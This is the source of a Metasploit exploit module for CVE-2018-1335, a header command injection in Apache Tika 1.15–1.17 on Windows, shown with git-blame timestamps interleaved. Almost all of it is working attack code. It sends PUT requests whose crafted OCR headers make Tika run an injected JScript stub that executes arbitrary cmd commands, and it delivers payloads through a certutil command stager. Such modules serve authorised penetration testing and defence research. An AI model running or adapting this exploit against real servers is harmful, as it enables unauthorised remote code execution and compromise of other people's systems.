2019-03-28 22:05:05 -04:00
|
|
|
##
|
|
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
|
##
|
|
|
|
|
|
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
2019-06-26 10:14:07 -05:00
|
|
|
include Msf::Exploit::CmdStager
|
2019-03-28 22:05:05 -04:00
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
|
include Msf::Exploit::Powershell
|
2020-09-18 11:38:43 +01:00
|
|
|
prepend Msf::Exploit::Remote::AutoCheck
|
2019-03-28 22:05:05 -04:00
|
|
|
|
|
|
|
|
def initialize(info = {})
|
2025-06-20 13:20:44 +01:00
|
|
|
super(
|
|
|
|
|
update_info(
|
|
|
|
|
info,
|
|
|
|
|
'Name' => 'Apache Tika Header Command Injection',
|
|
|
|
|
'Description' => %q{
|
2019-03-28 22:05:05 -04:00
|
|
|
This module exploits a command injection vulnerability in Apache
|
2025-06-20 13:20:44 +01:00
|
|
|
Tika 1.15 - 1.17 on Windows. A file with the image/jp2 content-type is
|
|
|
|
|
used to bypass magic bytes checking. When OCR is specified in the
|
|
|
|
|
request, parameters can be passed to change the parameters passed
|
|
|
|
|
at command line to allow for arbitrary JScript to execute. A
|
|
|
|
|
JScript stub is passed to execute arbitrary code. This module was
|
|
|
|
|
verified against version 1.15 - 1.17 on Windows 2012.
|
|
|
|
|
While the CVE and finding show more versions vulnerable, during
|
|
|
|
|
testing it was determined only > 1.14 was exploitable due to
|
|
|
|
|
jp2 support being added.
|
|
|
|
|
},
|
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'Privileged' => false,
|
|
|
|
|
'Platform' => 'win',
|
|
|
|
|
'Targets' => [
|
|
|
|
|
[
|
|
|
|
|
'Windows',
|
|
|
|
|
{
|
|
|
|
|
'Arch' => [ARCH_X86, ARCH_X64],
|
|
|
|
|
'Platform' => 'win',
|
|
|
|
|
'CmdStagerFlavor' => ['certutil']
|
2019-06-26 10:14:07 -05:00
|
|
|
}
|
|
|
|
|
]
|
2019-03-28 22:05:05 -04:00
|
|
|
],
|
2025-06-20 13:20:44 +01:00
|
|
|
'DefaultTarget' => 0,
|
|
|
|
|
'DisclosureDate' => '2018-04-25',
|
|
|
|
|
'Author' => [
|
2019-03-28 22:05:05 -04:00
|
|
|
'h00die', # msf module
|
2019-07-30 16:55:06 -04:00
|
|
|
'David Yesland', # edb submission
|
|
|
|
|
'Tim Allison' # discovery
|
2019-03-28 22:05:05 -04:00
|
|
|
],
|
2025-06-20 13:20:44 +01:00
|
|
|
'References' => [
|
2019-03-28 22:05:05 -04:00
|
|
|
['EDB', '46540'],
|
|
|
|
|
['URL', 'https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/'],
|
|
|
|
|
['URL', 'https://lists.apache.org/thread.html/b3ed4432380af767effd4c6f27665cc7b2686acccbefeb9f55851dca@%3Cdev.tika.apache.org%3E'],
|
|
|
|
|
['CVE', '2018-1335']
|
2025-06-23 12:00:29 +01:00
|
|
|
],
|
|
|
|
|
'Notes' => {
|
2025-06-23 12:43:46 +01:00
|
|
|
'Reliability' => UNKNOWN_RELIABILITY,
|
|
|
|
|
'Stability' => UNKNOWN_STABILITY,
|
|
|
|
|
'SideEffects' => UNKNOWN_SIDE_EFFECTS
|
2025-06-23 12:00:29 +01:00
|
|
|
}
|
2025-06-20 13:20:44 +01:00
|
|
|
)
|
|
|
|
|
)
|
2019-03-28 22:05:05 -04:00
|
|
|
|
|
|
|
|
register_options(
|
2019-03-28 22:07:01 -04:00
|
|
|
[
|
2019-03-28 22:05:05 -04:00
|
|
|
Opt::RPORT(9998),
|
|
|
|
|
OptString.new('TARGETURI', [true, 'The base path to the web application', '/'])
|
2025-06-20 13:20:44 +01:00
|
|
|
]
|
|
|
|
|
)
|
2019-03-28 22:05:05 -04:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def check
|
|
|
|
|
res = send_request_cgi({
|
2025-06-20 13:20:44 +01:00
|
|
|
'uri' => normalize_uri(target_uri),
|
|
|
|
|
})
|
2019-06-26 10:11:48 -05:00
|
|
|
if res.nil?
|
|
|
|
|
vprint_error('No server response, check configuration')
|
|
|
|
|
return CheckCode::Safe
|
|
|
|
|
elsif res.code != 200
|
2019-03-28 22:05:05 -04:00
|
|
|
vprint_error('No server response, check configuration')
|
|
|
|
|
return CheckCode::Safe
|
|
|
|
|
end
|
2019-06-26 10:11:48 -05:00
|
|
|
|
|
|
|
|
if res.body =~ /Apache Tika (\d.[\d]+)/
|
2021-02-17 12:33:59 +00:00
|
|
|
version = Rex::Version.new($1)
|
2019-03-28 22:05:05 -04:00
|
|
|
vprint_status("Apache Tika Version Detected: #{version}")
|
2021-02-17 12:33:59 +00:00
|
|
|
if version.between?(Rex::Version.new('1.15'), Rex::Version.new('1.17'))
|
2019-03-28 22:05:05 -04:00
|
|
|
return CheckCode::Vulnerable
|
|
|
|
|
end
|
|
|
|
|
end
|
|
|
|
|
CheckCode::Safe
|
|
|
|
|
end
|
|
|
|
|
|
2019-06-26 10:14:07 -05:00
|
|
|
def execute_command(cmd, opts = {})
|
|
|
|
|
cmd.gsub(/"/, '\"')
|
2025-06-20 13:20:44 +01:00
|
|
|
jscript = "var oShell = WScript.CreateObject('WScript.Shell');\n"
|
2019-06-26 10:14:07 -05:00
|
|
|
jscript << "var oExec = oShell.Exec(\"cmd /c #{cmd}\");"
|
2019-03-28 22:05:05 -04:00
|
|
|
|
|
|
|
|
print_status("Sending PUT request to #{peer}#{normalize_uri(target_uri, 'meta')}")
|
|
|
|
|
res = send_request_cgi({
|
2025-06-20 13:20:44 +01:00
|
|
|
'method' => 'PUT',
|
|
|
|
|
'uri' => normalize_uri(target_uri, 'meta'),
|
|
|
|
|
'headers' => {
|
|
|
|
|
"X-Tika-OCRTesseractPath" => '"cscript"',
|
|
|
|
|
"X-Tika-OCRLanguage" => "//E:Jscript",
|
|
|
|
|
"Expect" => "100-continue",
|
|
|
|
|
"Content-type" => "image/jp2",
|
|
|
|
|
"Connection" => "close"
|
|
|
|
|
},
|
|
|
|
|
'data' => jscript
|
|
|
|
|
})
|
2019-06-26 10:14:07 -05:00
|
|
|
|
|
|
|
|
fail_with(Failure::Disconnected, 'No server response') unless res
|
2019-03-28 22:05:05 -04:00
|
|
|
unless (res.code == 200 && res.body.include?('tika'))
|
2019-06-26 10:14:07 -05:00
|
|
|
fail_with(Failure::UnexpectedReply, 'Invalid response received, target may not be vulnerable')
|
2019-03-28 22:05:05 -04:00
|
|
|
end
|
|
|
|
|
end
|
2019-06-26 10:14:07 -05:00
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
|
execute_cmdstager(linemax: 8000)
|
|
|
|
|
end
|
2019-03-28 22:05:05 -04:00
|
|
|
end
|
